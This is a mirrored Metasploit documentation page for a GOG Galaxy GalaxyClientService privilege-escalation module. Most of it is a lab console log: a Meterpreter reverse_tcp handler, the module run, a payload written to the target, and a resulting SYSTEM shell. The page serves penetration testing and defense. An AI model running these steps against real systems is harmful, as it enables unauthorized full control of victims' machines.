CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md
Views: 1904

Vulnerable Application

GOG Galaxy is a video game management client. One of its Windows services, GalaxyClientService, runs with SYSTEM privileges. In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to execute arbitrary commands as SYSTEM.

A vulnerable version need only be installed on the target machine in order to be exploitable.

Verification Steps

  1. Start msfconsole.

  2. Acquire a Meterpreter session.

  3. Do: use exploit/windows/local/gog_galaxyclientservice_privesc

  4. Do: set SESSION <session_no>

  5. Do: exploit

  6. Verify that you get a Meterpreter session.

Options

WORKING_DIR

The initial working directory of the command.

Scenarios

GOG Galaxy Client v1.2.66.64 on Windows 10

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service.  Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows